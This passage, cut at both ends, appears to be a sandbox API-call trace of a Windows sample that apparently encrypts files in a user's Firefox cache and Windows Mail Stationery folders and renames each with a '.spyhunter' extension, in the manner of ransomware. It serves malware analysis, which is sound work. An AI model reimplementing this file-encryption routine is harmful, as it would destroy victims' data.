lpOverlapped=0x0) returned 1 [0155.305] CloseHandle (hObject=0xa0) returned 1 [0155.305] GetProcessHeap () returned 0x2c0000 [0155.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f487f8 | out: hHeap=0x2c0000) returned 1 [0155.305] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ebe0 | out: pbBuffer=0x270ebe0) returned 1 [0155.305] GetProcessHeap () returned 0x2c0000 [0155.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0155.306] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ebd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ebd8*=0x30) returned 1 [0155.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.307] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01") returned 109 [0155.307] StrStrW (lpFirst="1D8FDd01", lpSrch=".txt") returned 0x0 [0155.307] GetProcessHeap () returned 0x2c0000 [0155.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0155.307] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb9c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270eb9c*=0x2800, lpOverlapped=0x0) returned 1 [0155.643] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.643] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eb9c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270eb9c*=0x2800, lpOverlapped=0x0) returned 1 [0155.643] GetProcessHeap () returned 0x2c0000 [0155.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0155.643] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.643] WriteFile (in: hFile=0xa0, lpBuffer=0x270ebdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb9c, lpOverlapped=0x0 | out: lpBuffer=0x270ebdc*, lpNumberOfBytesWritten=0x270eb9c*=0x4, lpOverlapped=0x0) returned 1 [0155.644] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb9c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270eb9c*=0x30, lpOverlapped=0x0) returned 1 [0155.644] CloseHandle (hObject=0xa0) returned 1 [0155.644] GetProcessHeap () returned 0x2c0000 [0155.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.645] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01.spyhunter") returned 119 [0155.645] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01.spyhunter")) returned 1 [0155.645] GetProcessHeap () returned 0x2c0000 [0155.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.646] GetProcessHeap () returned 0x2c0000 [0155.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0155.646] GetProcessHeap () returned 0x2c0000 [0155.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbcd08 | out: hHeap=0x2c0000) returned 1 [0155.646] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ebd8 | out: pbBuffer=0x270ebd8) returned 1 [0155.646] GetProcessHeap () returned 0x2c0000 [0155.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0155.646] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ebd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ebd0*=0x30) returned 1 [0155.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.649] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 91 [0155.649] StrStrW (lpFirst="Roses.htm", lpSrch=".txt") returned 0x0 [0155.649] GetProcessHeap () returned 0x2c0000 [0155.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0155.649] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb94, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270eb94*=0xe9, lpOverlapped=0x0) returned 1 [0155.649] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff17, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.649] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe9, lpNumberOfBytesWritten=0x270eb94, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270eb94*=0xe9, lpOverlapped=0x0) returned 1 [0155.650] GetProcessHeap () returned 0x2c0000 [0155.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0155.650] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.650] WriteFile (in: hFile=0xa0, lpBuffer=0x270ebd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb94, lpOverlapped=0x0 | out: lpBuffer=0x270ebd4*, lpNumberOfBytesWritten=0x270eb94*=0x4, lpOverlapped=0x0) returned 1 [0155.650] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb94, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270eb94*=0x30, lpOverlapped=0x0) returned 1 [0155.650] CloseHandle (hObject=0xa0) returned 1 [0155.650] GetProcessHeap () returned 0x2c0000 [0155.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.650] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.spyhunter") returned 101 [0155.650] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm.spyhunter")) returned 1 [0155.651] GetProcessHeap () returned 0x2c0000 [0155.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.651] GetProcessHeap () returned 0x2c0000 [0155.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0155.651] GetProcessHeap () returned 0x2c0000 [0155.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45a28 | out: hHeap=0x2c0000) returned 1 [0155.651] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ebd8 | out: pbBuffer=0x270ebd8) returned 1 [0155.651] GetProcessHeap () returned 0x2c0000 [0155.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0155.651] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ebd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ebd0*=0x30) returned 1 [0155.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.652] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 93 [0155.652] StrStrW (lpFirst="Peacock.jpg", lpSrch=".txt") returned 0x0 [0155.652] GetProcessHeap () returned 0x2c0000 [0155.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0155.652] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb94, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270eb94*=0x13fb, lpOverlapped=0x0) returned 1 [0155.834] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffec05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.834] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x13fb, lpNumberOfBytesWritten=0x270eb94, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270eb94*=0x13fb, lpOverlapped=0x0) returned 1 [0155.834] GetProcessHeap () returned 0x2c0000 [0155.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0155.834] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.834] WriteFile (in: hFile=0xa0, lpBuffer=0x270ebd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb94, lpOverlapped=0x0 | out: lpBuffer=0x270ebd4*, lpNumberOfBytesWritten=0x270eb94*=0x4, lpOverlapped=0x0) returned 1 [0155.836] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb94, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270eb94*=0x30, lpOverlapped=0x0) returned 1 [0155.836] CloseHandle (hObject=0xa0) returned 1 [0155.836] GetProcessHeap () returned 0x2c0000 [0155.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.836] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.spyhunter") returned 103 [0155.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg.spyhunter")) returned 1 [0155.837] GetProcessHeap () returned 0x2c0000 [0155.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.837] GetProcessHeap () returned 0x2c0000 [0155.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0155.837] GetProcessHeap () returned 0x2c0000 [0155.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c886f0 | out: hHeap=0x2c0000) returned 1 [0155.837] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ebd0 | out: pbBuffer=0x270ebd0) returned 1 [0155.838] GetProcessHeap () returned 0x2c0000 [0155.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0155.838] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ebc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ebc8*=0x30) returned 1 [0155.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 99 [0155.840] StrStrW (lpFirst="OrangeCircles.jpg", lpSrch=".txt") returned 0x0 [0155.840] GetProcessHeap () returned 0x2c0000 [0155.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0155.840] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270eb8c*=0x18ed, lpOverlapped=0x0) returned 1 [0155.871] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffe713, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.871] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x18ed, lpNumberOfBytesWritten=0x270eb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270eb8c*=0x18ed, lpOverlapped=0x0) returned 1 [0155.871] GetProcessHeap () returned 0x2c0000 [0155.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0155.871] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.871] WriteFile (in: hFile=0xa0, lpBuffer=0x270ebcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb8c, lpOverlapped=0x0 | out: lpBuffer=0x270ebcc*, lpNumberOfBytesWritten=0x270eb8c*=0x4, lpOverlapped=0x0) returned 1 [0155.871] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb8c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270eb8c*=0x30, lpOverlapped=0x0) returned 1 [0155.871] CloseHandle (hObject=0xa0) returned 1 [0155.872] GetProcessHeap () returned 0x2c0000 [0155.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.872] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.spyhunter") returned 109 [0155.872] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg.spyhunter")) returned 1 [0155.873] GetProcessHeap () returned 0x2c0000 [0155.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.873] GetProcessHeap () returned 0x2c0000 [0155.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0155.873] GetProcessHeap () returned 0x2c0000 [0155.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2b758 | out: hHeap=0x2c0000) returned 1 [0155.873] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ebd0 | out: pbBuffer=0x270ebd0) returned 1 [0155.873] GetProcessHeap () returned 0x2c0000 [0155.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0155.873] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ebc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ebc8*=0x30) returned 1 [0155.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.875] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 92 [0155.875] StrStrW (lpFirst="Garden.htm", lpSrch=".txt") returned 0x0 [0155.875] GetProcessHeap () returned 0x2c0000 [0155.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0155.875] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270eb8c*=0xe7, lpOverlapped=0x0) returned 1 [0155.876] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff19, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.876] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xe7, lpNumberOfBytesWritten=0x270eb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270eb8c*=0xe7, lpOverlapped=0x0) returned 1 [0155.876] GetProcessHeap () returned 0x2c0000 [0155.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0155.876] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.876] WriteFile (in: hFile=0xa0, lpBuffer=0x270ebcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb8c, lpOverlapped=0x0 | out: lpBuffer=0x270ebcc*, lpNumberOfBytesWritten=0x270eb8c*=0x4, lpOverlapped=0x0) returned 1 [0155.876] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb8c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270eb8c*=0x30, lpOverlapped=0x0) returned 1 [0155.876] CloseHandle (hObject=0xa0) returned 1 [0155.876] GetProcessHeap () returned 0x2c0000 [0155.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.876] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.spyhunter") returned 102 [0155.876] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm.spyhunter")) returned 1 [0155.877] GetProcessHeap () returned 0x2c0000 [0155.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.877] GetProcessHeap () returned 0x2c0000 [0155.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0155.877] GetProcessHeap () returned 0x2c0000 [0155.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4c900 | out: hHeap=0x2c0000) returned 1 [0155.877] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ebc8 | out: pbBuffer=0x270ebc8) returned 1 [0155.877] GetProcessHeap () returned 0x2c0000 [0155.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0155.877] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ebc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ebc0*=0x30) returned 1 [0155.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.878] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 93 [0155.878] StrStrW (lpFirst="Desktop.ini", lpSrch=".txt") returned 0x0 [0155.878] GetProcessHeap () returned 0x2c0000 [0155.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0155.878] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270eb84*=0x285, lpOverlapped=0x0) returned 1 [0155.879] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffd7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.879] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x270eb84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270eb84*=0x285, lpOverlapped=0x0) returned 1 [0155.879] GetProcessHeap () returned 0x2c0000 [0155.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0155.879] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.879] WriteFile (in: hFile=0xa0, lpBuffer=0x270ebc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb84, lpOverlapped=0x0 | out: lpBuffer=0x270ebc4*, lpNumberOfBytesWritten=0x270eb84*=0x4, lpOverlapped=0x0) returned 1 [0155.879] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb84, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270eb84*=0x30, lpOverlapped=0x0) returned 1 [0155.879] CloseHandle (hObject=0xa0) returned 1 [0155.880] GetProcessHeap () returned 0x2c0000 [0155.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.880] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.spyhunter") returned 103 [0155.880] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.spyhunter" (normalized: 